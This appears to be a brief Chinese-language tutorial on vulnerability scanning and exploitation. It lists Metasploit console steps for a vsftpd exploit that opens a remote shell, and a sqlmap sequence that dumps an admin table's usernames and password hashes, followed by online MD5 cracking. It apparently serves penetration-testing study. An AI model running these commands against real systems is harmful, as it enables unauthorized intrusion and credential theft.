一、漏洞扫描原理
扫描器通过发送对应的验证数据到目标具体服务进行验证。当收到目标返回的响应与存在的漏洞响应一致时,表明有漏洞。
二、漏洞扫描工具
1、漏洞扫描工具--nmap
使用nmap也可以进行漏洞扫描:
nmap --script vuln 目标IP地址
2、漏洞扫描工具--Nessus
三、漏洞利用--metasploit
1、利用Metasploit对扫描到的漏洞加以利用。
2、步骤:
1、终端输入:msfconsole
2、search vsftpd
3、use exploit/unix/ftp*******
4、set payload cmd/unix/interact
5、show options
6、set rhost 目标IP
7、show options
8、exploit
四、web漏洞扫描
1、web漏洞扫描其实就是每个扫描器读取自己的Payload进行探测。web漏洞扫描器有:Owasp-zap、Awvs、Appscan、Nikto、burpsuite,每个扫描器都有自己独特的payload。
2、nikto -host IP地址,主要是针对HTTP服务器
3、漏洞利用
1、sqlmap -u 目标网址
2、sqlmap -u "目标网址" --tables
3、sqlmap -u "目标网址" -T 上一步弹出来的名称 --columns
4、sqlmap -u "目标网址" -T admin -C "admin,password" --dump
5、在www.cmd5.com进行md5解密